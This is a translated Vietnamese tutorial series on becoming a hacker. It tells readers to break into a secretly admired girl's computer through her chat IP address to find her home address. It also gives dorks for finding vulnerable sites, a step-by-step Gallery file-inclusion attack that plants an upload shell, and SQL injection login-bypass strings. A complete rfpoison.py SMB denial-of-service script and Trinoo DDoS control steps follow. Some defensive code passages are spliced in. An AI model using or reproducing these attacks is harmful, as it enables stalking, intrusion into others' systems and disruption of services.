_ We can use this method to sneak into the computer of the girl we secretly admire and look for data about her address (provided she is using a home computer and you get lucky finding the address). Just chat with her on Y!Mass, then go to DOS and type the command:

c:\>netstat -n

When using this method, close all other windows and keep only the Y!Mass chat frame with her; that makes it easier to determine her IP address. Then use the intrusion method I described above. (Perhaps our pal ty khung, back when he was courting a girl far away over the net, also used this trick to sneak in and find out her address, hehe.) You will succeed if the victim's machine has no firewall or proxy installed.

======================================================

Many of you have asked me to give exact addresses to practice on, but I cannot, because experience with earlier guides that gave exact addresses showed that once you had practiced and gained admin rights, some of you deleted their database. That way HVA would get the reputation of being the source of vandalism on the net. Please understand: if anything, I only describe ways for you to find addresses that have the bug, and never give any specific address.

======================================================

In part 4 I will cover techniques for keeping intruders out of your own computer while you are online, a summary of the steps when we decide to hack a Web site, techniques for finding buggy Web sites to practice on, the technique of hacking the Web through the Gallery bug, etc.

The most basic knowledge to become a Hacker - Part 4

26.) Understanding RPC (Remote Procedure Call):

_ Windows NT provides the ability to use RPC to execute distributed applications. Microsoft RPC includes libraries and services that let distributed applications run in the Windows NT environment. Distributed applications consist of several processes executing some defined task. These processes can run on one or many computers.

_ Microsoft RPC uses a name service provider to locate servers on the network. The Microsoft RPC name service provider must go together with the Microsoft RPC name service interface (NIS). NIS includes API functions that allow access to many entities in the same name service database (the name service database holds entities, groups of entities, and the history of entities on the server). When Windows NT is installed, Microsoft Locator is automatically chosen as the name service provider. It is the best-suited name service provider in a Windows NT network environment.

27.) A simple technique to counter unauthorized intrusion while online via RPC (Remote Procedure Call):

_ If you suspect someone is intruding into your machine or an admin is watching you via remote desktop, just turn off the remote procedure call feature; then, for the moment, no program can remote desktop in to watch you. It also blocks most tools that break into the machine (since most of those tools are written to connect based on remote procedure call (over tcp/ip)). Most trojans rely on this protocol too. How to turn it off: go to Services / Remote Procedure Call (right-click), choose Startup type / Disabled or Manual / Apply.

This is a very effective defense for a PC (combined with turning off file sharing it becomes very hard to get hacked), but on a LAN it will cause you no small amount of trouble, because you will not be able to run programs that depend on this facility. Choose what is reasonable for the way you work. In my view, on a LAN just install a firewall and you are reasonably safe.

(Based on the article by brother i nh c khoai, khoaimi, admin of HVA)

28.) The steps of hacking a web site nowadays:

_ According to the listing in the book Hacking Exposed 3, to hack a Web site we normally carry out the following steps:

+ FootPrinting: This is what a hacker does when he wants to gather the maximum amount of information about the server/company/user. It includes details of IP addresses, Whois, DNS, etc., sometimes official information related to the target. Often the hacker simply uses the search engines on the net to find that information.

+ Scanning: Once the information is in hand, the next step is to assess and identify the services the target has. This includes port scanning, OS fingerprinting, etc. Tools used here include nmap, WS pingPro, siphon, fscan and many others.

+ Enumeration (listing, to find the holes): The third step is to look for poorly protected resources, or user accounts that can be used to get in. It includes default passwords, default scripts and services. Many network administrators do not know about these values or have never changed them.

+ Gaining Access: Now the intruder tries to get into the network with the information obtained in the three steps above. The methods used here may be attacks on buffer overflow bugs, grabbing and decrypting the password file, or, most primitively, brute forcing the password (trying every possibility). Tools often used at this step are NAT, podium, or L0pht.

+ Escalating Privileges: For example, if the hacker got into the network with a guest account, he will try to take control of the whole system. The hacker will try to crack the admin's password, or use a privilege escalation hole. John and Riper are two very commonly used password-cracking programs.

+ Pilfering (used when the files holding passwords are exposed): Once more the search engines are used to find ways into the network. Text files containing passwords or other insecure mechanisms can be tasty prey for the hacker.

+ Covering Tracks: After getting the information he needs, the hacker tries to erase his traces, deleting the operating system's log files so that the administrator does not notice the system was compromised, or, if he does, cannot find out who the intruder was.

+ Creating "Back Doors" (creating a back door so the next intrusion is easier): The hacker leaves "Back Doors", that is, a mechanism that lets him get back in by a secret route without much effort, by installing a Trojan or creating a new user (in an organization with many users). The tools here are the various Trojans and keyloggers.

+ Denial of Service (DoS): If the intrusion fails, DoS is the last resort for attacking the system. If the system is not configured correctly, it will be broken and let the hacker in. Or, in other cases, DoS will simply stop the system from working. Tools often used for DoS attacks are trin00, Pong Of Death, teardrop, the various nukers and flooders. This method is very potent and is still widely used today.

_ Depending on his knowledge and skill, a hacker skips some steps. It is not necessary to follow the sequence. Remember the saying: know the enemy and know yourself, and you will win a hundred battles.

(Material from HVA and hackervn.net)

29.) How to find buggy Web sites:

_ Surely you know the Web sites dedicated to searching for information on the net? But you probably never expected that we can use those sites to find buggy Web sites (I usually use google.com and recommend you use it too, because it is very powerful and effective).

_ If you are interested in Web site bugs and want to find them, just go to google.com and type the buggy fragment after allinurl:. For example, we have the following buggy Web fragment:

cgi-bin/php.cgi?/etc/passwd

you would type:

allinurl:cgi-bin/php.cgi?/etc/passwd

It will list the Web sites that have this bug for you; look at the bottom of each listed result (the green address line), and if a line reads exactly like the keyword you entered, that site has or had the bug. Whether you can get in also depends on whether the site has fixed the bug yet.

_ If you are interested in forum bugs and want to find forums of this kind to practice on, just enter the keyword


powered by

The following example finds forums using Snitz 2000:

powered by Snitz 2000

_ However, the chance of finding exactly the right buggy forum or Web site this way is not high; pay attention to the special string in the URL that characterizes each kind of Web site or forum (this is very important; please look into it further on your own). For example, to search for the Hosting Controller bug we have the following characteristic fragment

"/admin or /advadmin or /hosting"

we type the keyword:

allinurl:/advadmin or allinurl:/admin or allinurl:/hosting

It will list Web sites whose URL has the form:

http://tentrangweb.com/advadmin or http://tentrangweb.com/admin or http://tentrangweb.com/hosting

For example, UBB forums have the characteristic fragment

"cgi-bin/ultimatebb.cgi?"

We search the same way as above. Once you know how to search like this, later you only need to follow the updates on HVA's Security Bugs page, posted daily by LeonHart, and you will understand what they mean and be able to check them yourself.

30.) Technique for hacking the Web through the Gallery bug (a form of the php code inject bug):

_ Gallery is a tool for creating a photo gallery on the web, written in PHP; exploiting this hole we can add a piece of PHP code that lets us upload, which is our main goal.

_ First register a free host; it is easiest to register at brinkster.com. Then open notepad and create a PHP file with the following code:

CODE
print "$filename was uploaded successfuly";
$realname = $_FILES['userfile']['name'];
print "realname is $realname\n";
print "copying file to uploads dir " . $realname;
copy($_FILES['userfile']['tmp_name'], *PATH* . $realname); // note: we will change *PATH* later
} else {
echo 'Possible file upload attack: filename' . $_FILES['userfile']['name'] . '.';
}
}
if ($act == "upload") {
handleupload();
}
echo "File:
";
?>

Name it upload.php; it will be used to upload to the victim's Web site.

_ Next, go to Google, type "Powered by gallery" and press enter; Google will list a pile of sites using Gallery. Pick any one and use the following link to test whether it still has the Gallery bug:

http://<the victim's Web site>/gallery/captionator.php?GALLERY_BASEDIR=http://wwwxx.brinkster.com/ /

If a rectangle appears at the very top, with a Go button to its right, consider that you have found a target. Now you can type commands through that rectangle to hack the victim's Web site. First type the command pwd to determine the absolute path of the current directory and press the Go button; when it gives the result, quickly note the path shown below (in my example the path I found is /home/abc/xyz/gallery). Then type the command ls -a to list its subdirectories. Now look at the result: you will see a pile of subdirectories listed. Always remember that our goal is to find a directory we can use to upload the upload.php file we prepared, so identify it by looking at the last word of each result line:
+ Rule out the directories named . or .., because these are the root or virtual directories (they are usually at the top of the result lines).
+ Also rule out lines whose last word has an extension (e.g. config.php, check.inc, etc.), because these are files, not directories.
+ What remains are the directories we can upload to, but I advise choosing lines whose directory name is accompanied by a number greater than 1 (you can see it in the second column from the left), since that both confirms it is a directory and not a virtual one, and makes it harder for the site's admin to notice when we plant our file. In my example I found the directory loveyou containing 12 files that we can upload to, so the actual path we upload to will be:

/home/abc/xyz/Gallery/loveyou

Now go into your host account and edit the content of the file init.php to be the same as the code of upload.php, but change *PATH* to /home/abc/xyz/gallery/loveyou/. At the same time, also prepare an upload.php on your own machine with *PATH* set to "" (two double quotes). Now we can upload upload.php to the victim's Web site; enter the following address in your Web browser:

http://<the victim's Web site>/gallery/captionator.php?GALLERY_BASEDIR=http://wwwxx.brinkster.com/ /

Another rectangle will appear, with 2 buttons beside it: a Browse button and an upload button. Use the Browse button to point to the upload.php file you prepared on your machine; when you click the upload button it uploads upload.php to the victim's Web site. Ok, now consider the hacking stage of the


Web site finished. From here on apply it to attack further, such as taking the database or passwords (do the same as in the earlier hacking guides), but you should only practice; do not delete their database or deface their Web site.

If you are a genuine hacker you need only upload a line saying "Hack by .." to the Web site and that is it. As on previous occasions, whether you succeed also depends on luck and on persistently studying and applying your knowledge.

(Based on the hacking guide by brother vnofear at viethacker.net)

The most basic knowledge to become a Hacker - Part 5

31.) What is a TCP/IP packet?

TCP/IP stands for Transmission Control Protocol and Internet Protocol; a TCP/IP packet is a block of data that is compressed, then given a header and sent to another computer. This is how the internet transmits information: by sending packets. The header of a packet contains the IP address of the packet's sender. You can rewrite a packet and make it look as if it came from someone else!! You can use this to try to get into a great many systems without being caught. You will have to run on Linux or have a program that lets you do this.

32.) What is Linux:

_ In the original sense, Linux is the kernel of an OS. The kernel is a piece of software responsible for communication between the computer's application programs and the hardware. It provides functions such as file management, virtual memory management, and input/output devices such as ports, screen, keyboard, .... But the Linux kernel is not yet an OS, so the Linux kernel must be combined with application programs written by the GNU organization to form a complete OS: the Linux OS. This is also why we see GNU/Linux when Linux is mentioned. Next, a company or organization packages these products (kernel and application programs), then adjusts some configuration to carry its own characteristics and adds an installation process for the Linux package, and we get a Distribution. Distributions differ in the number and kind of software packaged, in the installation process, and in the kernel version. Some major Linux distributions today are: Debian, Redhat, Mandrake, SlackWare, Suse.

33.) Basic commands to know when using or intruding into a Linux system:

_ The man command: when you want to know how to use some command, use this one. Syntax: $ man <command>. Example: $ man man

_ The uname command: gives basic information about the system. Example: $ uname -a ; it prints output such as:

Linux gamma 2.4.18 #3 Wed Dec 26 10:50:09 ICT 2001 i686 unknown

_ The id command: view the current uid/gid (see the current group and name)

_ The w command: see which users are logged in and what they are doing on the system. Example: $ w prints output such as:

10:31pm up 25 days, 4:07, 18 users, load average: 0.06, 0.01, 0.00

_ The ps command: view information about the processes on the system. Example: $ ps axuw

_ The cd command: whenever you want to move to a directory you must remember this command. Example: $ cd /usr/bin ----> it takes you to the bin directory

_ The mkdir command: create a directory. Example: $ mkdir /home/convit ---> it creates the directory convit in /home

_ The rmdir command: remove a directory. Example: $ rmdir /home/conga ----> it removes the directory conga in /home.
_ The ls command: list the contents of a directory. Example: $ ls -laR /

_ The printf command: print formatted data, like using printf() in C++. Example: $ printf %s "\x41\x41\x41\x41"

_ The pwd command: print the current directory. Example: $ pwd ------> it tells us where we currently are:

/home/level1

_ The commands cp, mv, rm mean: copy, move, delete files. Example with rm (del): $ rm -rf /var/tmp/blah -----> it deletes the file blah. Do likewise with cp and mv.

_ The find command: search for files and directories. Example: $ find / -user level2

_ The grep command: a search tool; the simplest usage is grep "something". Example: $ ps axuw | grep "level1"

_ The strings command: print all printable characters in a file. Use it to find string declarations in a program or system library calls, and sometimes you even find passwords. Example: $ strings /usr/bin/level1

_ The strace command: (linux) traces system calls and signals, very useful for following the flow of a program and the fastest way to determine where a program fails. On other unix systems the equivalent tools are truss, ktrace. Example: $ strace /usr/bin/level1

_ The cat, more commands: print the contents of a file to the screen.

$ cat /etc/passwd | more --> it prints the contents of the passwd file the quickest way.
$ more /etc/passwd ----> it prints the contents of the passwd file page by page.

_ The hexdump command: print the input data as ascii, hex, octal and decimal values. Example: $ echo AAAA | hexdump

_ The commands cc, gcc, make, gdb: compilation and debugging tools.
Example: $ gcc -g -o bof bof.c
Example: $ make bof
Example: $ gdb level1
(gdb) break main
(gdb) run

_ The perl command: a language. Example: $ perl -e 'print "A"x1024' | ./bufferoverflow (buffer overflow when we feed in 1024 characters)

_ The bash command: an effort to automate your tasks with shell scripts, very powerful and flexible. To learn about bash and see what it is like: $ man bash


_ The ls command: view directory contents (list the files in a directory).
Example: $ ls /home ----> shows all files in the Home directory
$ ls -a -----> shows all files, including hidden files
$ ls -l -----> prints information about the files

_ Writing output data to a file:
Example: $ ls /usr/bin > ~/convoi ------> writes the listing of the bin directory into the file convoi.

34.) Basic knowledge around Linux:

a.) Some important directories on the server:

_ /home: where users' files are kept (e.g. a user who logs into the system with the name convit has a directory /home/convit)

_ /bin: where the essential basic Unix commands such as ls are kept.
_ /usr/bin: where other special commands are kept, commands used by special users and for system administration.

_ /boot: where the kernel and other files used at boot live.
_ /etc: the files for network operation, NFS (Network File System), mail (this is the key place we need to exploit the most)

_ /var: administrative files
_ /usr/lib: standard libraries such as libc.a
_ /usr/src: location of program sources.

b.) Location of the passwd file on a number of different versions:

CODE
AIX 3                   /etc/security/passwd            !
                        /tcb/auth/files//
A/UX 3.0s               /tcb/files/auth/?/*
BSD4.3-Reno             /etc/master.passwd              *
ConvexOS 10             /etc/shadpw                     *
ConvexOS 11             /etc/shadow                     *
DG/UX                   /etc/tcb/aa/user/               *
EP/IX                   /etc/shadow                     x
HP-UX                   /.secure/etc/passwd             *
IRIX 5                  /etc/shadow                     x
Linux 1.1               /etc/shadow                     *
OSF/1                   /etc/passwd[.dir|.pag]          *
SCO Unix #.2.x          /tcb/auth/files//
SunOS4.1+c2             /etc/security/passwd.adjunct    ##username
SunOS 5.0               /etc/shadow
System V Release 4.0    /etc/shadow                     x
System V Release 4.2    /etc/security/* database
Ultrix 4                /etc/auth[.dir|.pag]            *
UNICOS                  /etc/udb                        *

35.) Exploiting Linux through the WU-FTP server security hole:

_ WU-FTP Server (developed by Washington University) is an FTP server program used quite widely on Unix & Linux systems (all distributors: Redhat, Caldera, Slackware, Suse, Mandrake....) and also on Windows....; hackers can execute their own commands remotely through file globbing, by overwriting files on the system.

_ However, exploiting this bug is not easy, because the following conditions must be met:
+ Must have an account on the server.
+ Must be able to place Shellcode into the memory of the server process.
+ Must send a special FTP command containing a special globbing pattern that the server does not detect as an error.
+ The hacker overwrites a Function with code pointing to a Shellcode, which can then be executed by the FTP Server itself.

_ Let us analyze the following example of overwriting a file on the FTP server:

CODE
ftp> open localhost


1405 ?     S    0:00 ftpd: accepting connections on port 21    <-- accepting connections on port 21
7611 tty3  S    1:29 gdb /usr/sbin/wu.ftpd
26256 ?    S    0:00 ftpd:sasha:anonymous/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
26265 tty3 R    0:00 bash -c ps ax | grep ftpd
(gdb) at 26256
Attaching to program: /usr/sbin/wu.ftpd, process 26256


before passing it on to the web application for processing; you can log in without a username and password, execute commands remotely, seize data and get root on the SQL server. The attack tool is any web browser, such as Internet Explorer, Netscape, Lynx, ...

_ You can find buggy Web sites by using the search engines to look for pages that allow submitting data. Some Web sites pass parameters through hidden areas, so you have to view the source to see them. For example, we determined that this page uses a data Submit thanks to the code we saw when viewing the source:

CODE

_ Check whether the Web site has this bug by entering the login and pass, in turn, as follows:

- Login: hi' or 1=1--
- Pass: hi' or 1=1--

If that does not work, try the following logins and passwords:

CODE
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a

If successful, you can log in without knowing the username and password. This bug involves the Query, so anyone who has studied databases can exploit it easily just by typing Query commands in the browser. If you want to understand this bug more thoroughly, look up the articles by the vicky group.

37.) An example of hacking the Web through the admentor bug (a form of the SQL Injection bug):

_ First go to google.com and find admentor Web sites with the keyword allinurl:admentor.
_ Usually you will get results such as:

http://www.someserver.com/admentor/admin/admin.asp

_ Try entering ' or ''=' in login and password:

CODE
Login: ' or ''='
Password: ' or ''='

_ If successful you enter the buggy site with the role of admin.
_ Let us look at how to fix this bug:

+ Filter special characters such as ' " ~ \ by inserting the following javascript code:

CODE
function RemoveBad(strTemp) {
    // strip space " ' % ; ( ) & + - from the input before it reaches the query
    strTemp = strTemp.replace(/\ |\"|\'|\%|\;|\(|\)|\&|\+|\-/g, "");
    return strTemp;
}

+ And call it from inside the asp script:

CODE
var login = RemoveBad(Request.QueryString("login"));
var password = RemoveBad(Request.QueryString("password"));

- That is it, the bug is fixed.
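As an added example (not code from the page or from admentor), the following Python/sqlite3 demo shows why the ' or ''=' and hi' or 1=1-- logins above succeed against a string-built query, what the RemoveBad blacklist costs legitimate users, and how a parameterized query closes the bug without banning any characters; the users table is constructed here.

```python
import re
import sqlite3

# Constructed sample users (not from the page); the second password contains
# characters the page's blacklist strips.
USERS = [("admin", "S3cretPass!", "admin"), ("bob", "p&ss-w0rd", "user")]


def make_db():
    """In-memory database so the demo runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (login TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn


def login_vulnerable(conn, login, password):
    """WHERE clause built by string concatenation, as in the vulnerable login
    page: quotes and -- in the input become part of the SQL text."""
    sql = ("SELECT login, role FROM users WHERE login = '%s' AND password = '%s'"
           % (login, password))
    return conn.execute(sql).fetchone()  # (login, role) or None


def remove_bad(value):
    """Python port of the page's RemoveBad() blacklist: space " ' % ; ( ) & + -."""
    return re.sub(r"[ \"'%;()&+\-]", "", value)


def login_blacklisted(conn, login, password):
    """The page's fix: filter first, then still concatenate."""
    return login_vulnerable(conn, remove_bad(login), remove_bad(password))


def login_parameterized(conn, login, password):
    """Bound parameters: the driver sends the values separately from the
    statement, so no input can change its structure and nothing is banned."""
    sql = "SELECT login, role FROM users WHERE login = ? AND password = ?"
    return conn.execute(sql, (login, password)).fetchone()


if __name__ == "__main__":
    db = make_db()
    payload = "' or ''='"
    print("concatenated :", login_vulnerable(db, payload, payload))
    print("blacklisted  :", login_blacklisted(db, payload, payload))
    print("bob after filter:", login_blacklisted(db, "bob", "p&ss-w0rd"))
    print("parameterized:", login_parameterized(db, payload, payload))
    print("bob parameterized:", login_parameterized(db, "bob", "p&ss-w0rd"))
```

The blacklist does stop the tautology but also locks out bob, whose real password contains & and -; the parameterized version rejects the payload and still lets bob in.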

- You can apply this hacking method to other Web sites that submit data; go and test it, our Vietnamese Web sites have this bug a lot; I have collected quite a few admin passwords this way (but I also told them to fix the bug).
- On many sites the login is not ' or ''= but nicknames actually registered on the site; go to the members link, find an admin's nick and test it.
Happy hacking.

In part 6 I will cover the denial of service attack (DoS attack), a formidable kind of attack that left a strong site like our HVA choked in the short time the admins were all out for coffee with no one watching. Along with it, the DoS attack methods that are and have been used.

The most basic knowledge to become a Hacker - Part 6

38.) What is a DoS attack? (Denial Of Services Attack)

A DoS attack (translated as denial of service attack) is a very dangerous kind of attack; with this kind you only need one computer connected to the Internet to attack the opponent's computer. In essence, in a DoS attack the hacker occupies a large amount of resources on the server (resources may be bandwidth, memory, cpu, disk, ...) so that the server can no longer answer requests from other people's machines (ordinary users' machines), and the server can quickly stop working, crash or reboot.

39.) The kinds of DoS attack currently known and in use:

a.) Winnuke:

_ This kind of DoS attack can only be applied to computers running Windows 9x. The hacker sends packets with "Out of Band" data to port 139 of the target computer. (Port 139 is the NetBIOS port; this port only accepts packets with the Out of Band flag set.) When the victim's computer receives these packets, a blue error screen is shown to the victim, because Windows receives the packets but does not know how to react to Out Of Band data, leading to a system crash.

b.) Ping of Death:

_ In this kind of DoS attack, we only need to send one large packet via the ping command to the target and its system hangs.

_ Example: ping -l 65000

c.) Teardrop:

_ As we know, all data sent over the network from the source system to the destination system goes through 2 processes: the data is split into small fragments at the source, each fragment carrying an offset value that determines its position in the data being transmitted. When these fragments arrive at the destination, the destination system uses the offset values to put the fragments back together in their original order. Exploiting this, we only need to send the destination a series of packets with overlapping offset values. The destination cannot reassemble these packets, loses control, and can crash, reboot or stop working if the number of packets with overlapping offsets is large enough!
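As an added example (not from the page), a small Python reassembler that does what the destination host described above must do with the offset values, and refuses overlapping fragments up front instead of losing control; the fragment sets are constructed here, and rejecting any overlap outright is a simplification assumed for the demo.

```python
from dataclasses import dataclass
from typing import List


@dataclass
class Fragment:
    offset: int   # byte offset of this piece inside the original datagram
    data: bytes
    more: bool    # "more fragments" flag: False only on the last piece


def reassemble(fragments: List[Fragment]) -> bytes:
    """Rebuild a datagram from its fragments using their offsets.

    Offsets that overlap or leave a gap raise ValueError instead of being
    trusted, so a teardrop-style set is refused before any copying happens.
    (Assumed policy for this demo: any overlap is rejected.)
    """
    if not fragments:
        raise ValueError("no fragments")
    ordered = sorted(fragments, key=lambda f: f.offset)
    out = bytearray()
    expected = 0  # offset at which the next fragment must start
    for frag in ordered:
        if frag.offset < expected:
            raise ValueError("fragment at offset %d overlaps data ending at %d"
                             % (frag.offset, expected))
        if frag.offset > expected:
            raise ValueError("gap before offset %d (expected %d)"
                             % (frag.offset, expected))
        out += frag.data
        expected += len(frag.data)
    if ordered[-1].more:
        raise ValueError("last fragment still has the more-fragments flag set")
    return bytes(out)


def is_teardrop(fragments: List[Fragment]) -> bool:
    """True when the set has the overlapping offsets a teardrop attack relies on."""
    try:
        reassemble(fragments)
    except ValueError as exc:
        return "overlaps" in str(exc)
    return False


# Constructed sample inputs (not captured traffic): a well-formed datagram ...
NORMAL = [Fragment(0, b"HELLO ", True),
          Fragment(6, b"TEARDROP ", True),
          Fragment(15, b"DEMO", False)]
# ... and a set whose second piece claims an offset inside the first piece.
TEARDROP = [Fragment(0, b"A" * 36, True),
            Fragment(24, b"B" * 20, False)]

if __name__ == "__main__":
    print(reassemble(NORMAL))
    print("teardrop pattern:", is_teardrop(TEARDROP))
```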

d.) SYN Attack:

_ In a SYN Attack, the hacker sends the target a series of SYN packets with non-existent source ip addresses. On receiving these SYN packets the target replies to those non-existent addresses and waits for a response from the forged ip addresses. Since the ip addresses do not exist, the target keeps waiting and waiting, and keeps these pending "requests" in memory, wasting a considerable amount of the server's memory that should be used for something else rather than waiting for responses that never come. If we send many packets with forged IP addresses at once, the system is overloaded and crashes or reboots.

==> throw the stone and hide the hand.

e.) Land Attack:

_ A Land Attack is similar to a SYN Attack, but instead of using non-existent ip addresses, the hacker uses the victim system's own ip address. This creates an endless loop inside the victim's system, between one side that needs a reply and another side that never sends one. ==> The old man's own stick beats his own back.

f.) Smurf Attack:

_ A Smurf Attack needs three components: the hacker (who orders the attack), the amplifier network (which obeys the hacker), and the victim's system. The hacker sends ICMP packets to the broadcast address of the amplifier network. The special thing is that these ICMP packets carry the victim's ip address as their source ip. When the packets reach the broadcast address of the amplifier network, the computers on that network think the victim's computer sent the ICMP packets and all reply to the victim's system with ICMP reply packets. The victim's system cannot withstand the enormous volume of these packets and quickly stops working, crashes or reboots. So by sending only a small number of ICMP packets, the amplifier network multiplies the ICMP packets many times over. The amplification factor depends on the number of machines in the amplifier network. The hacker's task is to capture as many networks or routers as possible that forward packets directly to the broadcast address without filtering source addresses at the packet outputs. With these systems in hand, the hacker can easily carry out Smurf Attacks on the systems he wants to hit. ==> one machine does the work and the whole crowd does the beating; the target is surely slowed down and beaten.

g.) UDP Flooding:

_ The UDP attack requires 2 systems to take part. The hacker makes his system enter a loop exchanging data over the UDP protocol, and forges the packets' source ip address as the loopback address (127.0.0.1), then sends the packet to the victim's system on the UDP echo port (7). The victim's system replies to the messages that 127.0.0.1 (itself) sent it, and the result is an endless loop. However, many systems do not allow the loopback address, so the hacker instead forges the ip address of some computer on the victim's network and floods the victim's system with UDP. If you try this and it fails, your own machine is the one that suffers.

h.) DNS attack:

_ The hacker can change an entry on the victim system's Domain Name Server so that it points to some website of the hacker's. When a client asks the DNS to resolve the hijacked address into an ip address, the DNS (whose temporary cache the hacker has altered) immediately resolves it to the ip address the hacker chose. The result is that instead of the Web site they wanted, the victims land on the Web site the hacker created. A truly effective way of denying service!

i.) Distributed DoS Attacks (DDoS):

_ DDoS requires at least a few hackers taking part. First the hackers try to penetrate poorly secured networks, then install the DDoS server program on those systems. Then the hackers agree on a time to use the DDoS client to connect to the DDoS servers, and simultaneously order those DDoS servers to launch a DDoS attack on the victim's system.

j.) DRDoS (The Distributed Reflection Denial of Service Attack):

_ This is probably the most dangerous kind of attack and brings down the opponent's computer fastest. The method is similar to DDoS, but instead of attacking with many computers, the attacker needs only one, attacking through the big servers of the world. Still using the method of forging the victim's IP address, the attacker sends packets to the strongest, fastest servers with the widest links, such as Yahoo etc.; these servers reply to the victim's address. Receiving so many packets at once through these big servers quickly saturates the victim's link and crashes or reboots the computer. This attack is dangerous because one simple computer connected to the Internet on an ordinary link can knock out even the owner of the best link in the world if we do not stop it in time. Our HVA Web site was DoSed recently with exactly this attack.

40.) Web DoS technique with Python:

_ This technique can only be used on WinNT, and you need time before the victim's computer goes down.

_ Download Python at http://www.python.org/ to use it.
_ Save the following code to the file rfpoison.py.


CODE
import string
import struct
from socket import *
import sys

def a2b(s):
    # hex text ("81 00 ...") -> raw byte string
    bytes = map(lambda x: string.atoi(x, 16), string.split(s))
    data = string.join(map(chr, bytes), '')
    return data

def b2a(s):
    # raw byte string -> hex text, for debugging
    bytes = map(lambda x: '%.2x' % x, map(ord, s))
    return string.join(bytes, ' ')

# NBSS session request
nbss_session = a2b("""81 00 00 48 20 43 4b 46 44 45
4e 45 43 46 44 45 46 46 43 46 47 45 46 46 43 43
41 43 41 43 41 43 41 43 41 43 41 00 20 45 48 45
42 46 45 45 46 45 4c 45 46 45 46 46 41 45 46 46
43 43 41 43 41 43 41 43 41 43 41 41 41 00 00 00
00 00""")

# SMB payloads, sent in order
crud = (
# SMBnegprot request
"""ff 53 4d 42 72 00
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 f4 01 00 00 01 00 00 81 00 02 50 43
20 4e 45 54 57 4f 52 4b 20 50 52 4f 47 52 41 4d
20 31 2e 30 00 02 4d 49 43 52 4f 53 4f 46 54 20
4e 45 54 57 4f 52 4b 53 20 31 2e 30 33 00 02 4d
49 43 52 4f 53 4f 46 54 20 4e 45 54 57 4f 52 4b
53 20 33 2e 30 00 02 4c 41 4e 4d 41 4e 31 2e 30
00 02 4c 4d 31 2e 32 58 30 30 32 00 02 53 61 6d
62 61 00 02 4e 54 20 4c 41 4e 4d 41 4e 20 31 2e
30 00 02 4e 54 20 4c 4d 20 30 2e 31 32 00""",
# SMBsesssetupX request
"""ff 53 4d 42 73 00
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 f4 01 00 00 01 00 0d ff 00 00 00 ff
ff 02 00 f4 01 00 00 00 00 01 00 00 00 00 00 00
00 00 00 00 00 17 00 00 00 57 4f 52 4b 47 52 4f
55 50 00 55 6e 69 78 00 53 61 6d 62 61 00""",
# SMBtconX request
"""ff 53 4d 42 75 00
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 f4 01 00 08 01 00 04 ff 00 00 00 00
00 01 00 17 00 00 5c 5c 2a 53 4d 42 53 45 52 56
45 52 5c 49 50 43 24 00 49 50 43 00""",
# SMBntcreateX request
"""ff 53 4d 42 a2 00
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 08 f4 01 00 08 01 00 18 ff 00 00 00 00
07 00 06 00 00 00 00 00 00 00 9f 01 02 00 00 00
00 00 00 00 00 00 00 00 00 00 03 00 00 00 01 00
00 00 00 00 00 00 02 00 00 00 00 08 00 5c 73 72
76 73 76 63 00""",
# SMBtrans bind request
"""ff 53 4d 42 25 00
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 08 f4 01 00 08 01 00 10 00 00 48 00 00
00 48 00 00 00 00 00 00 00 00 00 00 00 00 00 4c
00 48 00 4c 00 02 00 26 00 00 08 51 00 5c 50 49
50 45 5c 00 00 00 05 00 0b 00 10 00 00 00 48 00
00 00 01 00 00 00 30 16 30 16 00 00 00 00 01 00
00 00 00 00 01 00 c8 4f 32 4b 70 16 d3 01 12 78
5a 47 bf 6e e1 88 03 00 00 00 04 5d 88 8a eb 1c
c9 11 9f e8 08 00 2b 10 48 60 02 00 00 00""",
# SMBtrans request
"""ff 53 4d 42 25 00
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 08 f4 01 00 08 01 00 10 00 00 58 00 00
00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 4c
00 58 00 4c 00 02 00 26 00 00 08 61 00 5c 50 49
50 45 5c 00 00 00 05 00 00 03 10 00 00 00 58 00
00 00 02 00 00 00 48 00 00 00 00 00 0f 00 01 00
00 00 0d 00 00 00 00 00 00 00 0d 00 00 00 5c 00
5c 00 2a 00 53 00 4d 00 42 00 53 00 45 00 52 00
56 00 45 00 52 00 00 00 00 00 01 00 00 00 01 00
00 00 00 00 00 00 ff ff ff ff 00 00 00 00"""
)
crud = map(a2b, crud)

def smb_send(sock, data, type=0, flags=0):
    # prepend the 4-byte NetBIOS session header: type, flags, length
    d = struct.pack('!BBH', type, flags, len(data))
    #print 'send:', b2a(d+data)
    sock.send(d+data)

def smb_recv(sock):
    s = sock.recv(4)
    assert(len(s) == 4)
    type, flags, length = struct.unpack('!BBH', s)
    data = sock.recv(length)
    assert(len(data) == length)
    #print 'recv:', b2a(s+data)
    return type, flags, data

def nbss_send(sock, data):
    sock.send(data)

def nbss_recv(sock):
    s = sock.recv(4)
    assert(len(s) == 4)
    return s

def main(host, port=139):
    s = socket(AF_INET, SOCK_STREAM)
    s.connect((host, port))
    nbss_send(s, nbss_session)
    nbss_recv(s)
    for msg in crud[:-1]:
        smb_send(s, msg)
        smb_recv(s)
    smb_send(s, crud[-1]) # no response to this
    s.close()

if __name__ == '__main__':
    print 'Sending poison...',
    main(sys.argv[1])
    print 'done.'

To actually bring down the other side's server you have to keep the DoS running for a while; if you cannot afford to wait, this method is best left alone. Still, trying it out to see how it works does no harm, does it?

41.) DDoS attacks via Trinoo:

_ You already know what a DDoS attack is, right? A Trinoo DDoS attack is launched by the attacker connecting to the Trinoo master and instructing it to start a DDoS against one or more targets. The master then contacts its daemons, passing them the addresses to attack and the length of time to attack them.

_ Both the master and the daemons are password protected: only someone who knows the password can control them, which is no problem if we are their real owner. These passwords are stored in encrypted (crypt()) form and are set when Trinoo is compiled from source into a binary. When you connect to a master it prints a prompt and waits for the password; if the password is wrong it drops the connection, if it is right you get the trinoo console:

attacker$ telnet 10.0.0.1 27665
Trying 10.0.0.1
Connected to 10.0.0.1
